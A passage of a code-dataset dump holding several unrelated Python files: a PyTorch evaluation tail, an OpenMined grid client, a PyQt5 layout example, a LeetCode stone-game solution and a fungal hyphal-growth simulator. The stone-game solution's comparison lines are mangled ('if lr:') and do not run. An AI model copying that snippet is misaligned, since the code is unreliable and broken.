model.load_state_dict(model_dict)\n\n # model.cuda()\n\n #model_dict = torch.load('Dataset1_AUC:0.815080211458067,MCC:0.38696326734790976.pl')['model']\n #model_dict = torch.load('Dataset1_AUC:0.8176693578653859,MCC:0.38087124402835537.pl')['model']\n #model_dict = torch.load('Dataset1_AUC:0.8145063558471666,MCC:0.3808646064782719.pl')['model']\n #model_dict = torch.load('Dataset1_AUC:0.8100931005721085,MCC:0.38683361339804234.pl')['model']\n \n #model_dict = torch.load('Dataset2_AUC:0.7980166652881828,MCC:0.30372675131967974.pl')['model']\n #model.load_state_dict(model_dict)\n criterion = nn.CrossEntropyLoss(weight=torch.FloatTensor([1, 17])).to(config.device)\n test_repres_list, test_label_list = model_eval(test_iter, model, criterion, config)\n\n #print('test current performance')\n #print(\n # '[ACC,\\t\\tPrecision,\\t\\tSensitivity,\\tSpecificity,\\t\\tF1,\\t\\tAUC,\\t\\t\\tMCC,\\t\\t TP, \\t\\tFP,\\t\\t\\tTN, \\t\\t\\tFN]')\n #plmt = test_metric.numpy()\n #print('%.5g\\t\\t' % plmt[0], '%.5g\\t\\t' % plmt[1], '%.5g\\t\\t' % plmt[2], '%.5g\\t\\t' % plmt[3],\n # '%.5g\\t' % plmt[4],\n # '%.5g\\t\\t' % plmt[5], '%.5g\\t\\t' % plmt[6], '%.5g\\t\\t' % plmt[7], ' %.5g\\t\\t' % plmt[8],\n # ' %.5g\\t\\t' % plmt[9], ' %.5g\\t\\t' % plmt[10])\n #print('#' * 60 + 'Predicted Label' + '#' * 60)\n #print()\n \n # print(label_pred)\n # model, best_performance, last_test_metric = train_test(train_iter, test_iter, config)\n # 保存\n print(\"representation: \", len(test_repres_list), \"label: \", len(test_label_list))\n torch.save({'repres_list':test_repres_list, 'label_list':test_label_list}, 'data2_64_TE.pl')\n # torch.save(model.state_dict(), 'bert_finetuned_model.pkl')\n \n pass\n else:\n # k cross validation\n model, valid_performance_list = k_fold_CV(train_iter, None, config)\n\n\n time_end = time.time()\n print('total time cost', time_end - time_start, 'seconds')\n","sub_path":"train/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":30032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472011909","text":"from grid.lib import utils\nfrom grid.base import PubSub\nfrom grid import channels, commands\nfrom bitcoin import base58\nfrom colorama import Fore, Back, Style\nimport ipywidgets as widgets\nimport json\nimport sys\nimport os\nimport random\nfrom .services.listen_for_openmined_nodes import ListenForOpenMinedNodesService\n\nclass Client(PubSub):\n\n def __init__(self,min_om_nodes=1,known_workers=list(),include_github_known_workers=True):\n super().__init__('client')\n self.progress = {}\n\n self.processes = {}\n\n self.processes['listen_for_openmined_nodes'] = ListenForOpenMinedNodesService(self,min_om_nodes,include_github_known_workers)\n # self.listen_for_openmined_nodes(min_om_nodes,include_github_known_workers)\n\n \n\n \n\n # TODO: torch\n \n\n # TODO: framework = 'torch'\n \n\n \"\"\"\n Grid Tree Implementation\n\n Methods for Grid tree down here\n \"\"\"\n\n def found_task(self, message):\n fr = base58.encode(message['from'])\n\n tasks = json.loads(message['data'])\n for task in tasks:\n # utils.store_task(task['name'], task['address'])\n name = task['name']\n addr = task['address']\n\n hbox = widgets.HBox([widgets.Label(name), widgets.Label(addr)])\n self.all_tasks.children += (hbox, )\n\n\n def find_tasks(self):\n self.publish(channels.list_tasks, \"None\")\n self.all_tasks = widgets.VBox([widgets.HBox([widgets.Label('TASK NAME'), widgets.Label('ADDRESS')])])\n self.listen_to_channel(channels.list_tasks_callback(self.id), self.found_task)\n\n return self.all_tasks\n\n def add_task(self, name, data_dir=None, adapter=None):\n if data_dir == None and adapter == None:\n print(f'{Fore.RED}data_dir and adapter can not both be None{Style.RESET_ALL}')\n return\n\n task_data = {\n 'name': name,\n 'creator': self.id\n }\n\n if data_dir != None:\n task_data['data_dir'] = data_dir\n if adapter != None:\n with open(adapter, 'rb') as f:\n adapter_bin = f.read()\n f.close()\n adapter_addr = self.api.add_bytes(adapter_bin)\n task_data['adapter'] = adapter_addr\n\n addr = self.api.add_json(task_data)\n utils.store_task(name, addr)\n\n data = json.dumps([{'name': name, 'address': addr}])\n self.publish('openmined:add_task', data)\n\n def best_models(self, task):\n self.show_models = widgets.VBox([widgets.HBox([widgets.Label('Model Address')])])\n self.listen_to_channel(channels.add_model(task), self.__added_model)\n self.publish(channels.list_models, task)\n\n return self.show_models\n\n def __added_model(self, message):\n info = self.api.get_json(message['data'])\n model_addr = info['model']\n\n hbox = widgets.HBox([widgets.Label(model_addr)])\n self.show_models.children += (hbox,)\n\n def load_model(self, addr):\n return utils.ipfs2keras(addr)\n","sub_path":"grid/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"240899734","text":"import sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\n\r\nclass Janela(QWidget):\r\n def __init__(self, Str=\"Janela\", x1=0, y1=0, dx=640, dy=480, cor=\"lightgray\"):\r\n super().__init__() ## Obrigatório\r\n self.setWindowTitle(Str)\r\n self.setGeometry(x1, y1, dx, dy)\r\n\r\n # Set window background color\r\n self.setAutoFillBackground(True)\r\n p = self.palette()\r\n p.setColor(self.backgroundRole(), QColor(cor))\r\n self.setPalette(p)\r\n\r\n self.inicialize()\r\n\r\n def inicialize(self):\r\n Grid=QGridLayout()\r\n Grid.setColumnStretch(1, 4)\r\n Grid.setColumnStretch(2, 4)\r\n\r\n Lb1=QLabel(self, text=\"First Name\")\r\n Lb2=QLabel(self, text=\"Last Name\")\r\n Lb3=QLabel(self, text=\"Text área\")\r\n\r\n p1 = self.palette()\r\n p1.setColor(self.backgroundRole(), Qt.yellow)\r\n\r\n Lb1.setAutoFillBackground(True)\r\n Lb1.setPalette(p1)\r\n\r\n Lb2.setAutoFillBackground(True)\r\n Lb2.setPalette(p1)\r\n\r\n Lb3.setAutoFillBackground(True)\r\n Lb3.setPalette(p1)\r\n\r\n Et1=QLineEdit(self, width=52)\r\n Et2=QLineEdit(self, width=52)\r\n\r\n Txt1=QTextEdit(self, height=8, width=40)\r\n\r\n Bt1=QPushButton(self, text='Botão 1')\r\n Bt2=QPushButton(self, text='Botão 2')\r\n\r\n Grid.addWidget(Lb1, 0, 0)\r\n Grid.addWidget(Lb2, 1, 0)\r\n Grid.addWidget(Lb3, 2, 0)\r\n\r\n Grid.addWidget(Et1, 0, 1, 1, 2)\r\n Grid.addWidget(Et2, 1, 1, 1, 2)\r\n Grid.addWidget(Txt1, 2, 1, 1, 2)\r\n\r\n Grid.addWidget(Bt1, 3, 1)\r\n Grid.addWidget(Bt2, 3, 2)\r\n\r\n self.setLayout(Grid)\r\n self.show()\r\n\r\n########################################################################################################################\r\n\r\nApp=QApplication(sys.argv)\r\n\r\nJan1=Janela(\"Minha janela\", 400, 200, 540, 380, \"cyan\")\r\n\r\nApp.exec_()\r\n","sub_path":"Prog2/exemplosProfessor/Aula_01_1a_QtApp_Grid.py","file_name":"Aula_01_1a_QtApp_Grid.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381808165","text":"class Solution:\n def stoneGameV(self, stoneValue: List[int]) -> int:\n @lru_cache(None)\n def dfs(start, end):\n if start==end: return 0\n res=float('-inf')\n for i in range(start, end):\n l, r=sums[i+1]-sums[start], sums[end+1]-sums[i+1]\n if lr: res=max(res, r+dfs(i+1, end))\n else:\n res=max(res, l+dfs(start, i), l+dfs(i+1, end))\n return res\n \n n=len(stoneValue)\n sums=[0]*(n+1)\n for i, v in enumerate(stoneValue):\n sums[i+1]=sums[i]+v\n return dfs(0, n-1)\n","sub_path":"python/stone-game-v.py","file_name":"stone-game-v.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"444749083","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport sys\nfrom datetime import datetime\nimport argparse\nimport pandas as pd\nimport numpy as np\nimport math\nfrom matplotlib import cm\nfrom matplotlib import collections as mc\nimport copy\nimport pdb\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom matplotlib.collections import PatchCollection\nimport imageio as io\nimport os\nimport matplotlib.colors as clr\nmatplotlib.rcParams.update({'font.size': 6})\n\n\ndef get_parser():\n # build commandline parser\n parser = argparse.ArgumentParser(\n description=\"MYCEMULATOR – Simulator of mycelial growth\\n\"\n \"As you can see, there are many parameters to tune in order to make the simulation fit your specific purpose.\\n\"\n \"Default values are all based on the growth of ATCC 1015.\\n\"\n \"Enjoy!\")\n parser.add_argument(\"-ani\",\"--animation\", type=str, dest=\"ani\", default=None, help=\"Name of folder of time-dependent png images and gif animation.\"\n \"An mp4 can easily be created from the images by using ffmpeg\")\n parser.add_argument(\"-pdf\", type=str, dest=\"pdf\", default=None, help=\"Name of pdf of time-dependent subplots.\")\n parser.add_argument(\"-img\", \"--img_ana\", type=str, dest=\"img_ana\",\n help=\"Use parameters from csv-output of image analysis tool\")\n parser.add_argument(\"--hours\", type=float, dest=\"hours\", default=12,\n help=\"Number of hours to simulate exponential hyphal growth for. Default: 12\")\n parser.add_argument(\"-tstep\", type=float, dest=\"tstep\", default=1/60,\n help=\"Number/part of hours per simulation round. Default: 1/60, i.e. 1 minute per round\")\n parser.add_argument(\"-field\", \"--fieldtype\", type=str, dest=\"fieldtype\", default=\"g\", choices=['g', 'u'],\n help=\"Substrate field type. Choose whether to use a uniform field (u) or a radial gradient field (g).\")\n parser.add_argument(\"-source\", action='store_true', dest=\"source\", default=False,\n help=\"Use to have an infinite substrate source at the edge of the simulation area.\")\n parser.add_argument(\"-mu_max\", type=float, dest=\"mu_max\", default=0.275733333333333,\n help=\"Mu_max. Maximum growth rate for the given strain in exponential phase. Default is biolector measurement of ATCC 1015\")\n parser.add_argument(\"-q\", type=float, dest=\"q\", default=0.016925731922538392,\n help=\"Branching frequency per hyphal element per hour (if not taken from image analysis output). Default is taken from image analysis of ATCC 1015\")\n parser.add_argument(\"-lat_sub_min\", type=float, dest=\"lat_sub_min\", default=10,\n help=\"Minimum substrate concentration for lateral branching to occur\")\n parser.add_argument(\"-ap_sub_min\", type=float, dest=\"ap_sub_min\", default=10,\n help=\"Minimum substrate concentration for apical branching to occur\")\n parser.add_argument(\"-ext_sub_min\", type=float, dest=\"ext_sub_min\", default=5,\n help=\"Minimum substrate concentration for tip extension to occur\")\n parser.add_argument(\"-S0\", type=float, dest=\"S0\", default=100,\n help=\"Initial uniform substrate concentration. Also boundary condition if '-source' is applied.\")\n parser.add_argument(\"-D\", type=float, dest=\"D\", default=0.99,\n help=\"Diffusion constant. Default: 0.99\")\n parser.add_argument(\"-S_tip\", type=float, dest=\"S_tip\", default=10,\n help=\"Substrate consumption of a hyphal tip\")\n parser.add_argument(\"-S_nontip\", type=float, dest=\"S_nontip\", default=1,\n help=\"Substrate consumption of a non-tip hyphal element\")\n return parser\n\n\ndef get_args():\n parser = get_parser()\n args = parser.parse_args()\n return args\n\n\ndef img_ana_parameters(csv_file):\n return pd.read_csv(csv_file, header=0)\n\n\ndef tip_extension_monod(mu_max, hyph_row, hyphal_elements, St, Ks, ext_sub_min, curvature_gamma_params, r, time):\n \"\"\"source: Lejeune et al 1995, Morphology of Trichoderma reesei QM 9414 in Submerged Cultures\"\"\"\n sep_distance = center_distance(hyph_row)\n if sep_distance >= 20:\n return hyphal_elements\n\n extension = mu_max * St[int(r/20*sep_distance)] / (St[int(r/20*sep_distance)] + Ks)\n if St[int(r/20*sep_distance)] > ext_sub_min and extension > np.random.uniform(0, 1):\n\n new_coord, center_dist, angles = list(), list(), list()\n for _ in range(10):\n new_angle = hyph_row.angle + np.random.choice((-1, 1)) * round(5*np.random.gamma(*curvature_gamma_params))\n\n # check that new angle is >=0 and < 360\n if not 0 <= new_angle < 360:\n new_angle = new_angle % 360\n new_ang = np.deg2rad(new_angle)\n old_ang = np.deg2rad(hyph_row.angle)\n x_mid, y_mid = hyph_row.x_mid + 0.5 * (np.cos(old_ang)+np.cos(new_ang)), hyph_row.y_mid + 0.5 * (np.sin(old_ang)+np.sin(new_ang))\n\n new_coord.append((x_mid, y_mid))\n dist = np.sqrt(x_mid ** 2 + y_mid ** 2)\n if dist > 20: dist = 20\n center_dist.append(dist)\n angles.append(new_angle)\n\n # if substrate concentration is more than 1% as high for one proposed angle than the first,\n # choose this angle, else choose first\n if St[int(r/20*max(center_dist))] > 1.01 * St[int(r/20*center_dist[0])]:\n new_x_mid, new_y_mid = new_coord[np.argmax(center_dist)]\n new_angle = angles[np.argmax(center_dist)] % 360\n\n else:\n new_x_mid, new_y_mid = new_coord[0]\n new_angle = angles[0] % 360\n\n hyphal_elements.loc[len(hyphal_elements)] = {'x_mid':new_x_mid, 'y_mid':new_y_mid, 'angle': new_angle, 'tip': True, 'time':time}\n\n # change tip status of hyph_row, as this hyphal element has been extended and is no longer a tip\n hyphal_elements.at[hyph_row.name, 'tip'] = False\n return hyphal_elements\n\n\ndef hyphal_length(hyphal_elements):\n return math.sqrt((hyphal_elements.x-hyphal_elements.x0)**2 + (hyphal_elements.y-hyphal_elements.y0)**2)\n\n\ndef substrate_per_distance(n_tip, n_nontip, St, S0=200, r=200, h=1, D=0.1, S_tip=5, S_nontip=5, fieldtype = \"g\", source = False):\n \"\"\"\n :param n_tip: number of tip hyphal_elements\n :param n_nontip: number of non-tip hyphal_elements\n :param St: St list of substrate values for previous simulation step\n :param S0: initial substrate concentration - also boundary condition\n :param r: radius of substrate field\n :param h: radial step size\n :param D: diffusion constant\n :param S_tip: amount of substrate used per tip hyphal element\n :param S_nontip: amount of substrate used per non-tip hyphal element\n\t:param fieldtype: choose gradient or uniform field\n\t:param source: choose whether to have an infinite source at the edge of the field or not\n :return: St: list of increasing substrate concentrations as a function of distance to center\n \"\"\"\n\n # uniform substrate field\n if fieldtype == \"u\":\n if source is False:\n if St[0] == 0:\n dSdt = [0 for i in range(r+1)]\n else:\n dSdt = [- (S_tip * n_tip + S_nontip * n_nontip)/(2*np.pi*r) for i in range(r+1)]\n else:\n dSdt = [- (S_tip * n_tip + S_nontip * n_nontip)/(2*np.pi*r) for i in range(r)]\n dSdt.append(0)\n\n # gradial substrate field\n elif fieldtype == \"g\":\n dSdt = [0 for i in range(r + 1)] # list to hold changes in substrate levels for this timestep\n # continuous equation is dS/dt = D*d2S/dr2 (minus use at centre) - using difference estimates for second order derivative\n\t\t# forward difference for center\n dSdt[0] = min(0, D * (St[0 + 2 * h] - 2 * St[1] + St[0]) / h ** 2 - (S_tip * n_tip + S_nontip * n_nontip))\n for rad in range(1, r):\n # centre difference for most of the field - also discarding positive differences which happen due to numerical solution\n dSdt[rad] = min(0, D * (St[rad + 1] - 2 * St[rad] + St[rad - 1]) / h ** 2)\n # centre difference but with S(rad>r)=S0\n if source is False:\n dSdt[r] = min(0, D * (-St[r] + St[r - 1]) / h ** 2)\n\n # add change in substrate level to previous level\n St = [max(0, a + b) for a, b in zip(St, dSdt)]\n\n # make sure substrate levels do not exceed initial level\n if max(St) > S0:\n St = [min(st, S0) for st in St]\n\n return St\n\n\ndef center_distance(hyph_row):\n \"\"\"Compute distance to center for a given hyphal element\"\"\"\n return np.sqrt(hyph_row.x_mid**2+hyph_row.y_mid**2)\n\n\ndef branching(hyph_row, St, min_substrate, p_branching, hyphal_elements, branch_angle_beta_params, r, time):\n \"\"\"\n Add laterally or apically branched hyphal_elements (by a certain probability) to hyphal_elements if enough substrate\n :param hyph_row: row from hyphal_elements df\n :param St: substrate concentration per distance for this timestep\n :param min_substrate: minimum substrate for branching to occur\n :param p_branching: probability of branching event, given enough substrate\n :param hyphal_elements: hyphal_elements df to add evt. branched septum to\n :return:\n \"\"\"\n # if given hyphal element hits the edge of the field, no branching event\n sep_distance = center_distance(hyph_row)\n if sep_distance >= 20:\n return hyphal_elements\n\n # branching occurs at a given probability if enough substrate\n if St[int(r/20*sep_distance)] > min_substrate and p_branching > np.random.uniform(0, 1):\n new_angle = hyph_row.angle + np.random.choice((-1,1)) * round(np.random.beta(*branch_angle_beta_params)*90) # 90 is the largest branching angle\n # check that new angle does not exceed 360\n if not 0 <= new_angle < 360: new_angle = new_angle % 360\n new_ang = np.deg2rad(new_angle)\n new_x_mid, new_y_mid = hyph_row.x_mid + 0.5 * np.cos(new_ang), hyph_row.y_mid + 0.5 * np.sin(new_ang)\n\n hyphal_elements.loc[len(hyphal_elements)] = {'x_mid':new_x_mid, 'y_mid':new_y_mid, 'angle': new_angle, 'tip': True, 'time':time}\n\n return hyphal_elements\n\n\ndef midpoints_to_endpoints(hyph_row):\n \"\"\"\n Use x_mid, y_mid and angle to find end coordinates of hyphal_elements\n \"\"\"\n angle = np.deg2rad(hyph_row.angle)\n x0, y0 = hyph_row.x_mid - 0.5 * np.cos(angle), hyph_row.y_mid - 0.5 * np.sin(angle)\n x1, y1 = hyph_row.x_mid + 0.5 * np.cos(angle), hyph_row.y_mid + 0.5 * np.sin(angle)\n return x0, y0, x1, y1\n\n\ndef plot_to_pdf(snapshots, St_snapshots, S0, r, tstep, out_pdf):\n # dimensions for subplots on one page (n-rows and m-cols)\n n, m = 3, 4\n pdf_name = out_pdf\n with PdfPages(pdf_name) as pdf:\n # initialize layout for plots\n f, axarr = plt.subplots(n, m, sharex='none', sharey='none')\n arr_ij = [(x, y) for x, y in np.ndindex(axarr.shape)]\n subplots = [axarr[index] for index in arr_ij]\n\n splot_index = 0\n\n S_max_index = np.argmax(St_snapshots[max(St_snapshots)])\n\n for i in range(0, len(snapshots)):\n snapshot_to_plot = snapshots[sorted(snapshots)[i]]\n St_to_plot = St_snapshots[sorted(snapshots)[i]]\n\n endpoints_df = pd.DataFrame({'x0y0x1y1': snapshot_to_plot.apply(midpoints_to_endpoints, axis=1)})\n x0, y0, x1, y1 = endpoints_df['x0y0x1y1'].str[0].to_list(), endpoints_df['x0y0x1y1'].str[1].to_list(), \\\n endpoints_df['x0y0x1y1'].str[2].to_list(), endpoints_df['x0y0x1y1'].str[3].to_list()\n\n line_segments = [[list(zip(x0, y0))[i], list(zip(x1,y1))[i]] for i in\n range(len(snapshot_to_plot))]\n # create continuous norm for mapping colors to hyphae according to time they occured\n hyphal_elements_norm = plt.Normalize(-10, len(snapshots)*1.25)\n red_cmap = clr.LinearSegmentedColormap.from_list('custom red', [(0, '#690909'), (0.5, '#AE1212'), (0.75, '#FD8D4C'),\n (1, '#FCE0CB')],N=400)\n lc = mc.LineCollection(line_segments, linewidths=0.5, norm=hyphal_elements_norm, cmap=red_cmap) # OrRd_r\n lc.set_array(snapshot_to_plot['time'])\n subplots[splot_index].add_collection(lc)\n\n substrate_norm = plt.Normalize(0, S0)\n xlist = np.linspace(-20, 20, 100)\n ylist = np.linspace(-20, 20, 100)\n X, Y = np.meshgrid(xlist, ylist)\n dist = np.sqrt(X ** 2 + Y ** 2)\n dist[dist > 20] = 20\n Z = [[St_to_plot[int(r/20*x)] for x in y] for y in dist]\n subplots[splot_index].contourf(X, Y, Z, cmap=cm.get_cmap('YlGn'), norm=substrate_norm, alpha=0.7)\n\n subplots[splot_index].autoscale()\n subplots[splot_index].margins(0.1)\n subplots[splot_index].set_title(\n f\"Time: {round(2 * i * tstep, 2)} h\\n\"\n f\"Number of hyphal_elements: {len(snapshot_to_plot)}\\n\"\n f\"Number of hyphal tips: {len(snapshot_to_plot[snapshot_to_plot.tip == True])}\\n\"\n f\"Branching frequency: {round((len(snapshot_to_plot[snapshot_to_plot.tip == True]) / len(snapshot_to_plot)) / (tstep * i + float('1e-10')), 3)}\\n\"\n f\"(branches per hyphal element per hour)\",\n fontsize=5)\n subplots[splot_index].set_xlim(-20, 20)\n subplots[splot_index].set_ylim(-20, 20)\n subplots[splot_index].axis('off')\n #subplots[splot_index].set_xticks(list(range(-60,70,30)))\n #subplots[splot_index].set_yticks(list(range(-60,70,30)))\n\n plt.tight_layout()\n\n # increment index counter\n splot_index += 1\n # a pdf page is full once the count is equal to n*m\n if splot_index == n * m:\n pdf.savefig()\n plt.close(f)\n f, axarr = plt.subplots(n, m, sharex='none', sharey='none')\n arr_ij = [(x, y) for x, y in np.ndindex(axarr.shape)]\n subplots = [axarr[index] for index in arr_ij]\n splot_index = 0\n\n # save last page\n pdf.savefig()\n plt.close(f)\n return pdf_name\n\n\ndef plot_for_animation(snapshots, St_snapshots, S0, dirname, r, tstep, max_time):\n\n for i in range(len(snapshots)):\n snapshot_to_plot = snapshots[sorted(snapshots)[i]]\n St_to_plot = St_snapshots[sorted(snapshots)[i]]\n\n endpoints_df = pd.DataFrame({'x0y0x1y1': snapshot_to_plot.apply(midpoints_to_endpoints, axis=1)})\n x0, y0, x1, y1 = endpoints_df['x0y0x1y1'].str[0].to_list(), endpoints_df['x0y0x1y1'].str[1].to_list(), \\\n endpoints_df['x0y0x1y1'].str[2].to_list(), endpoints_df['x0y0x1y1'].str[3].to_list()\n\n fig, ax = plt.subplots(figsize=(8,8))\n\n line_segments = [[list(zip(x0, y0))[i], list(zip(x1, y1))[i]] for i in\n range(len(snapshot_to_plot))]\n\n # create continuous norm for mapping colors to hyphae according to time they occured\n hyphal_elements_norm = plt.Normalize(0, max_time)\n purple_cmap = clr.LinearSegmentedColormap.from_list('custom purple', [(0, '#440154FF'),(0.75, '#404788FF'), (0.95, '#9999FF'), (1,'#CCCCFF')], N=200)\n lc = mc.LineCollection(line_segments, linewidths=1, norm=hyphal_elements_norm,\n cmap=purple_cmap) # cmap='OrRd_r'\n lc.set_array(snapshot_to_plot['time'])\n ax.add_collection(lc)\n\n substrate_norm = plt.Normalize(0, S0) # S0\n green_cmap = clr.LinearSegmentedColormap.from_list('custom green', ['#FFFFFF', '#55C667FF'], N=200) #73D055FF\n xlist = np.linspace(-20, 20, 1000)\n ylist = np.linspace(-20, 20, 1000)\n X, Y = np.meshgrid(xlist, ylist)\n dist = np.sqrt(X ** 2 + Y ** 2)\n dist[dist>20] = 20\n Z = [[St_to_plot[int(r/20*x)] for x in y] for y in dist]\n\n ax.contourf(X, Y, Z, cmap=green_cmap, norm=substrate_norm,\n alpha=0.5) # norm=substrate_norm #YlGn cm.get_cmap('YlGn')\n\n ax.autoscale()\n #ax.margins(0.1)\n ax.set_title(\n f\"Time: {round(2*i*tstep,2)} h\\n\"\n f\"Number of hyphal_elements: {len(snapshot_to_plot)}\\n\"\n f\"Number of hyphal tips: {len(snapshot_to_plot[snapshot_to_plot.tip == True])}\\n\"\n f\"Branching frequency: {round((len(snapshot_to_plot[snapshot_to_plot.tip == True]) / len(snapshot_to_plot))/(tstep*i+float('1e-10')),3)}\\n\"\n f\"(branches per hyphal element per hour)\",\n fontsize=9)\n ax.set_xlim(-20, 20)\n ax.set_ylim(-20, 20)\n plt.axis('off')\n\n plt.tight_layout()\n if not os.path.exists(dirname):\n os.mkdir(dirname)\n plt.savefig(f\"{dirname}/image-{'0'*(4-len(str(i)))}{i}.png\")\n plt.close(fig)\n\n return dirname\n\n\ndef make_gif(filenames, gifname):\n \"\"\"\n Make a gif of files in filenames\n \"\"\"\n with io.get_writer(gifname, mode='I', duration=0.05) as writer:\n for filename in filenames:\n image = io.imread(filename)\n writer.append_data(image)\n writer.close()\n return\n\n\ndef make_mp4(dirname):\n \"\"\"\n Make an mp4 movie of png files in directory dirname\n \"\"\"\n os.system(f\"ffmpeg -framerate 20 -pattern_type glob -i '{dirname}/image*.png'\"\n f\" -c:v libx264 -r 30 -pix_fmt yuv420p {dirname}/movie.mp4\")\n return\n\n\ndef main(args):\n\n # PARAMETERS USED IN THE SIMULATION\n\n # if given output from image analysis tool, use parameters from this\n if args.img_ana:\n img_ana_params = img_ana_parameters(args.img_ana)\n q_raw = img_ana_params['branching_frequency'].iloc[0]\n curvature_gamma_params = (img_ana_params['curvature_gamma_a'].iloc[0], img_ana_params['curvature_gamma_scale'].iloc[0])\n branch_angle_beta_params = (img_ana_params['angle_beta_a'].iloc[0], img_ana_params['angle_beta_b'].iloc[0])\n\n # default distribution parameters are based on image analysis of ATCC 1015\n else:\n q_raw = args.q\n curvature_gamma_params = (1.6114694580278444, 2.0238222211970487)\n branch_angle_beta_params = (4.28868341157166, 0.9839464337063648)\n\n\n\n\n # parameters for substrate gradient\n fieldtype = args.fieldtype # type of substrate field (uniform or gradient)\n source = args.source # source / no source at edge of field\n S0 = args.S0 # initial substrate concentration\n r = 400 # \"radius\" of substrate field\n h = 0.01 # radial step size\n D = args.D # diffusion constant\n S_tip = args.S_tip # substrate consumption by tips\n S_nontip = args.S_nontip # substrate consumption by non-tips\n tstep = args.tstep # time of 1 simulation round in hours\n N = args.hours/tstep # max simulation rounds\n branch_substrate_dependency = 1.3 # branching dependency on substrate concentration\n St = [S0 for i in range(r + 1)] # initial uniform substrate field\n\n # parameters for branching/extension\n q = q_raw * tstep # scaling braching frequency to time step\n p_lateral = 3/4*q # lateral branching frequency\n p_apical = 1/4*q # apical branching frequency\n lat_sub_min = args.lat_sub_min # minimum substrate level for lateral branching\n ap_sub_min = args.ap_sub_min # minimum substrate level for apical branching\n ext_sub_min = args.ext_sub_min # minimum substrate level for tip extension\n mu_max = args.mu_max # maximal growth rate (exponential phase)\n\n # lists for saving results during the simulation\n snapshots = dict()\n St_snapshots = dict()\n\n # initialize the first eight hyphal_elements growing from a single spore\n n_hyphal_elements = 8\n hyphal_elements_dict = {'x_mid':[-0.5,0.5,0,0, np.sqrt(2)/4, -np.sqrt(2)/4, -np.sqrt(2)/4, np.sqrt(2)/4], 'y_mid':[0,0,-0.5,0.5, np.sqrt(2)/4, np.sqrt(2)/4, -np.sqrt(2)/4, -np.sqrt(2)/4], 'angle':[180,0,270,90,45,135,225,315 ], 'tip':[True, True, True, True, True, True, True, True], 'time':[0,0,0,0,0,0,0,0]}\n hyphal_elements = pd.DataFrame(hyphal_elements_dict)\n\n # append initial dataframe to snapshot lists\n snapshots[0] = (copy.deepcopy(hyphal_elements))\n St_snapshots[0] = St\n\n # actual simulation\n i, m = 1, 0\n while i < N:\n hyphal_elements_tip = hyphal_elements[hyphal_elements.tip == True]\n hyphal_elements_nontip = hyphal_elements[hyphal_elements.tip == False]\n St = substrate_per_distance(n_tip=len(hyphal_elements_tip), n_nontip=len(hyphal_elements_nontip), St=St, D=D, S_tip=S_tip, S_nontip=S_nontip, r=r, fieldtype = fieldtype, source = source)\n\n for j in range(len(hyphal_elements_nontip)):\n # lateral branching for non-tip hyphal_elements\n branching(hyphal_elements_nontip.iloc[j], St, lat_sub_min, (branch_substrate_dependency*np.mean(St)/S0)*p_lateral, hyphal_elements, branch_angle_beta_params, r=r, time=i)\n\n for k in range(len(hyphal_elements_tip)):\n # apical branching for hyphal tips\n branching(hyphal_elements_tip.iloc[k], St, ap_sub_min, p_apical, hyphal_elements, branch_angle_beta_params, r=r, time=i)\n # extensions for hyphal tips, using the Monod equation\n tip_extension_monod(mu_max, hyph_row=hyphal_elements_tip.iloc[k], hyphal_elements=hyphal_elements, St=St, Ks=200,\n ext_sub_min=ext_sub_min, curvature_gamma_params=curvature_gamma_params, r=r, time=i)\n\n i += 1\n if (i) % 2 == 0:\n print(f\"Iteration = {i}\\tNumber of hyphal_elements = {len(hyphal_elements)}\")\n snapshots[i] = copy.deepcopy(hyphal_elements)\n St_snapshots[i] = copy.deepcopy(St)\n\n print('# Simulation done! Plotting...')\n\n\n # make gif animation\n if args.ani:\n dir_name = plot_for_animation(snapshots, St_snapshots, S0, dirname=args.ani, r=r, tstep=tstep, max_time=i)\n filenames = sorted(dir_name+'/'+fn for fn in os.listdir(dir_name) if fn.startswith('image'))\n make_gif(filenames, f'{dir_name}/{args.ani}.gif')\n make_mp4(dir_name)\n\n # make pdf of subplots\n if args.pdf:\n pdf_name = plot_to_pdf(snapshots, St_snapshots, S0, r=r, tstep=tstep, out_pdf=args.pdf)\n\n return\n\n\nif __name__ == '__main__':\n print(\"# Running Mycemulator...\")\n start_time = datetime.now()\n args = get_args()\n print(\"# arguments:\", args)\n pdf_name = main(args)\n end_time = datetime.now()\n print(f'# Done!\\nDuration: {end_time-start_time}')\n","sub_path":"simulation_v13.py","file_name":"simulation_v13.py","file_ext":"py","file_size_in_byte":23079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"263834658","text":"import re\nimport numpy as np\n\ndef search12Names():\n\tnamesFile = open('./googleExtensions/names_with_anomalies.txt', 'r').readlines()\n\tfilename = \"./crawled/concatScores.txt\"\n\tallScores = open(filename, 'r').read()\n\tgoogleCounter = 0 \n\tblocks = re.split('-{40,}', allScores)\n\tgoogleBlocks = []\n\tfor block in blocks:\n\t\tblock = block.split('\\n')\n\t\tgoogleNameFile = namesFile\n\t\tfor googleName in googleNameFile:\n\t\t\tif( ( block[1].split('/')[-1] in googleName.split('/')[-1] ) & (len(block[1]) > 0)):\n\t\t\t\tgoogleCounter +=1\n\t\t\t\tgoogleBlocks.append(block)\n\t# GET ALSO FROM REVIEWS\n\tfilename = \"./crawled/concatReviews.txt\"\n\tallScores = open(filename, 'r').read()\n\tgoogleCounterR = 0 \n\tblocks = re.split('-{41,}', allScores)\n\tgoogleBlocksR = []\n\tprint(len(blocks))\n\tfor block in blocks[1:]:\n\t\tblock = block.split('\\n')\n\t\tgoogleNameFile = namesFile\n\t\tfor googleName in googleNameFile:\n\t\t\tif(len(block) > 1):\n\t\t\t\tif( ( block[1].split('/')[-1] in googleName.split('/')[-1] ) & (len(block[1]) > 